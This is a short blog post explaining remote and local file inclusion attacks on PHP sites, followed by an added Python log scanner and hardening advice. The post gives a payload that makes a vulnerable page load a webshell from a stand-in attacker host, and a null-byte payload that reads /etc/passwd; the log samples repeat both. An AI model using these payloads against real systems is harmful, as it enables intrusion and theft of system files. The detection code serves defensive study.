Irregular Expressions

Aug 29 2012   7:50PM GMT

Remote File Inclusions

Dan O'Connor

I am currently testing a few PHP shells that I have against a test PHP site I created, and I thought I would share some of the basics of an RFI (Remote File Inclusion). When I need to deal with web apps, this is the second thing I will try, right after SQL injection.

Here is the Wikipedia article for another explanation.

In most cases I would use this to either display the contents of a file or execute another PHP script, like a PHP-based shell. If I am not really sure what I am looking for, I will use a PHP-based shell, something like this.

Typically what I will do is crawl the site, look for variables on each page, and attempt something like this (borrowed from the Wikipedia example).

/vulnerable.php?COLOR=http://evil.example.com/webshell.txt?

A very simple and powerful method to attack sites.
It can also be used for local file traversal: instead of a remote file, you can specify a local file.

/vulnerable.php?COLOR=/etc/passwd%00

In these cases the %00 is very important for your success.
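Seen from the defending side, both request shapes above leave a recognizable trace in the web server's access log. The following is an added example, not code from the original post: a small Python scanner that decodes each query parameter and tags values that look like a URL, contain a null byte, or point at a local path. The log lines, client addresses, `/out.php` and all function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed access-log lines (not from a real server); 2 and 3 are the post's two requests.
SAMPLE_LOG = """\
203.0.113.7 - - [29/Aug/2012:19:50:01 +0000] "GET /vulnerable.php?COLOR=blue HTTP/1.1" 200 512
203.0.113.7 - - [29/Aug/2012:19:50:04 +0000] "GET /vulnerable.php?COLOR=http://evil.example.com/webshell.txt? HTTP/1.1" 200 4096
203.0.113.7 - - [29/Aug/2012:19:50:09 +0000] "GET /vulnerable.php?COLOR=/etc/passwd%00 HTTP/1.1" 200 1830
198.51.100.20 - - [29/Aug/2012:19:51:12 +0000] "GET /vulnerable.php?COLOR=http%3A%2F%2Fevil.example.com%2Fwebshell.txt%3F HTTP/1.1" 200 4096
198.51.100.20 - - [29/Aug/2012:19:52:30 +0000] "GET /out.php?next=https%3A%2F%2Fexample.org%2F HTTP/1.1" 302 0
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
SCHEME = re.compile(r'^[a-z][a-z0-9+.\-]*://', re.I)

def fully_decode(value, rounds=3):
    # A proxy or the application may decode more than once, so undo nested
    # percent-encoding with a bounded number of passes.
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(value):
    """Return the inclusion indicators present in one (already decoded) parameter value."""
    v = fully_decode(value)
    tags = []
    if SCHEME.match(v):                    # value is itself a URL (remote include shape)
        tags.append("remote_url")
    if "\x00" in v:                        # %00 never belongs in a legitimate parameter
        tags.append("null_byte")
    if v.startswith("/") or "../" in v:    # value names a local filesystem path
        tags.append("local_path")
    return tags

def scan(log_text):
    """Return (client, path, parameter, status, tags) for each suspicious parameter."""
    hits = []
    for m in filter(None, map(REQUEST.match, log_text.splitlines())):
        client, target, status = m.groups()
        url = urlsplit(target)
        # parse_qsl performs the first round of percent-decoding.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            tags = classify(value)
            if tags:
                hits.append((client, url.path, name, int(status), tags))
    return hits

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

The redirect parameter in the last sample line is flagged as well, so hits need triage against what each parameter is meant to carry. Detection complements the fix on the PHP side: keep `allow_url_include` off and map the parameter to a fixed allowlist of files instead of passing it to `include`.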
